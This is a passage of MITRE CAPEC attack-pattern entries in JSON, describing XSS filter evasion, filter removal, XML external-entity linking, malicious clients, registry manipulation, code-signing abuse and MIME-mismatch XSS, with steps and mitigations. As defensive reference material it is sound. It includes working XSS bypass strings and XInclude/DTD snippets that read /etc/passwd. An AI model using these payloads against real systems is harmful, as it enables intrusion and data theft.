processed in a case insensitive manner. If the site\'s web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \\"script\\" tag using the alternate forms of \\"Script\\" or \\"ScRiPt\\" may bypass filters where \\"script\\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injection payload variations on input parameters] Possibly using an automated tool, an attacker requests variations on the inputs they surveyed before. They send parameters that include variations of payloads. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and tries many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass non trivial filters in the application",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP request to a web application."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["In this example, the attacker tries to get <script>alert(1)<\/script> executed by the victim\'s browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter:","when the applications gets this input string, it will replace all \\"script\\" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker:","In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., <script>HERE<\/script>). For the attacker to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter","and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \\"alert\\" would be stripped. An attacker will then create a special payload to bypass this filter:","when the applications gets this input string, it won\'t replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example,","would be executed by the JavaScript engine like alert(1) is."],"div":["<scriscriptpt>alert(1)</scscriptript>",{"style":"margin-left:10px;","class":"attack"},"<script>alert(1)<\/script>",{"style":"margin-left:10px;","class":"result"},"((\\\\w+)\\\\s*\\\\(.*\\\\)|alert|eval|function|document)",{"style":"margin-left:10px;","class":"mitigation"},"this[\'al\' + \'ert\'](1)",{"style":"margin-left:10px;","class":"attack"},"($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!\'\'+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"87"}},"References":{"Reference":[{"External_Reference_ID":"REF-69","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-70","Section":"Testing for Cross site scripting"},{"External_Reference_ID":"REF-71"},{"External_Reference_ID":"REF-72","Section":"WASC-08 - Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting Using Alternate Syntax",{"Date":"2017-05-01"}]}},"200":{"ID":"200","Name":"Removal of filters: Input filters, output filters, data masking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content. For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application\'s administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information. For example, an application\'s output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records. This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"207"}},"Prerequisites":{"Prerequisite":"The target application must utilize some sort of filtering mechanism (input, output, or data masking)."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"201":{"ID":"201","Name":"Serialized Data External Linking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"231"},{"Nature":"ChildOf","CAPEC_ID":"278"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.","Technique":["Use an automated tool to record all instances of URLs that process requests with serialized data.","Use a browser to manually explore the website and analyze how the application processes serialized data requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious data message that contains references to sensitive files."},{"Step":"3","Phase":"Exploit","Description":"[Launch an External Linking attack] Send the malicious crafted message containing the reference to a sensitive file to the target URL."}]},"Prerequisites":{"Prerequisite":"The target must follow external data references without validating the validity of the reference target."},"Skills_Required":{"Skill":["To send serialized data messages with maliciously crafted schema.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Configure the serialized data processor to only retrieve external entities from trusted sources."},"Example_Instances":{"Example":[{"p":["The following DTD would attempt to open the /dev/tty device:","A malicious actor could use this crafted DTD to reveal sensitive information."],"div":["<!DOCTYPE doc [ <!ENTITY ent SYSTEM \\"file:///dev/tty\\"> ]>",{"style":"margin-left:10px;","class":"informative"}]},{"p":"The following XML snippet would attempt to open the /etc/passwd file:","div":["<foo xmlns:xi=\\"http://www.w3.org/2001/XInclude\\"> <xi:include parse=\\"text\\" href=\\"file:///etc/passwd\\"/></foo>",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":[{"External_Reference_ID":"REF-73"},{"External_Reference_ID":"REF-74"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Payload_Activation_Impact, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Prerequisites"}],"Previous_Entry_Name":["XML Entity Blowup",{"Date":"2018-07-31"},"XML Entity Linking",{"Date":"2020-07-30"}]}},"202":{"ID":"202","Name":"Create Malicious Client","Abstraction":"Standard","Status":"Draft","Description":"An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary."},"Resources_Required":{"Resource":"The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"203":{"ID":"203","Name":"Manipulate Registry Information","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The targeted application must rely on values stored in a registry.","The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API."]},"Skills_Required":{"Skill":["The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Ensure proper permissions are set for Registry hives to prevent users from modifying keys.","Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.","Employ robust identification and audit/blocking using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern."]},"Example_Instances":{"Example":"Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application\'s ability to store it)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1112","Entry_Name":"Modify Registry"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, References, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"}],"Previous_Entry_Name":["Manipulate Application Registry Values",{"Date":"2018-07-31"}]}},"204":{"ID":"204","Name":"Lifting Sensitive Data Embedded in Cache","Abstraction":"Detailed","Status":"Draft","Description":"An attacker examines a target application\'s cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"167"},{"Nature":"CanPrecede","CAPEC_ID":"560"}]},"Prerequisites":{"Prerequisite":["The target application must store sensitive information in a cache.","The cache must be inadequately protected against attacker access."]},"Resources_Required":{"Resource":"The attacker must be able to reach the target application\'s cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"524"},{"CWE_ID":"311"},{"CWE_ID":"1239"},{"CWE_ID":"1258"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Lifting cached, sensitive data embedded in client distributions (thick or thin)",{"Date":"2015-11-09"}]}},"206":{"ID":"206","Name":"Signing Malicious Code","Abstraction":"Detailed","Status":"Draft","Description":"The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer\'s key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim\'s computer. This differs from CAPEC-673, because the adversary is performing the code signing.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or aquired normally through a certificate authority."},{"Step":"2","Phase":"Explore","Description":"Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach"},{"Step":"3","Phase":"Experiment","Description":"The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally."},{"Step":"4","Phase":"Exploit","Description":"Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary."}]},"Prerequisites":{"Prerequisite":"The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer\'s name.)"},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"732"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1553.002","Entry_Name":"Subvert Trust Controls:Code Signing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Prerequisites, Related_Attack_Patterns"}],"Previous_Entry_Name":["Lifting signing key and signing malicious code from a production environment",{"Date":"2018-07-31"}]}},"207":{"ID":"207","Name":"Removing Important Client Functionality","Abstraction":"Standard","Status":"Draft","Description":"An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Attackers can, in some cases, get around logic put in place to \'guard\' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The attacker probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.","Technique":["The attacker probes by exploring an application\'s functionality and its underlying mapping to server-side components.","The attacker reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation."]},{"Step":"2","Phase":"Experiment","Description":"[Determine which functionality to disable or remove] The attacker tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.","Technique":"The attacker reverse engineers the client-side code to determine which functionality to disable or remove."},{"Step":"3","Phase":"Exploit","Description":"[Disable or remove the critical functionality from the client code] Once the functionality has been determined, the attacker disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.","Technique":"The attacker disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server."}]},"Prerequisites":{"Prerequisite":"The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client."},"Skills_Required":{"Skill":["To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.",{"Level":"High"},"The attacker installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.","Design: Ship client-side application with integrity checks (code signing) when possible.","Design: Use obfuscation and other techniques to prevent reverse engineering the client code."]},"Example_Instances":{"Example":["Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.","Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they\'re not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).","Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"References":{"Reference":[{"External_Reference_ID":"REF-75","Section":"Greasemonkey"},{"External_Reference_ID":"REF-76"},{"External_Reference_ID":"REF-77","Section":"Greasemonkey"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns"}],"Previous_Entry_Name":["Removing Important Functionality from the Client",{"Date":"2015-12-07"}]}},"208":{"ID":"208","Name":"Removing/short-circuiting \'Purse\' logic: removing/mutating \'cash\' decrements","Abstraction":"Detailed","Status":"Draft","Description":"An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"207"}},"Prerequisites":{"Prerequisite":"The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations."},"Resources_Required":{"Resource":"The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client\'s purse logic. Reverse engineering tools would be necessary for this."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"209":{"ID":"209","Name":"XSS Using MIME Type Mismatch","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary\'s script may run on the target unsanitized, possibly revealing the victim\'s cookies or executing arbitrary script in their browser.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"592"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary identifies a webpage that allows uploading content through an HTTP POST request. This is typically a blog or forum where other users will access the uploaded content."},{"Step":"2","Phase":"Experiment","Description":"The adversary creates a file with scripting content that they wish to be executed on other users\' web browsers. This file is then uploaded through a POST request and the MIME type is specified as a file type that cannot execute scripting content, such as text/plain."},{"Step":"3","Phase":"Experiment","Description":"The adversary then attempts to access the uploaded content to see if the browser correctly executes their desired scripting content"},{"Step":"4","Phase":"Exploit","Description":"Once the adversary has determined that their uploaded script will run when accessed, they either wait for users to access the content on their own or they target users to access their content through phishing emails."},{"Step":"5","Phase":"Exploit","Description":"The adversary\'s script can do just about anything, but a common use is to read a user\'s cookies which may contain a token. This can then be used to launch a Cross Site Request Forgery Attack."}]},"Prerequisites":{"Prerequisite":["The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.","The victim\'s browser must detect the true type of a mis-labeled scripting file and invoke the appropriate 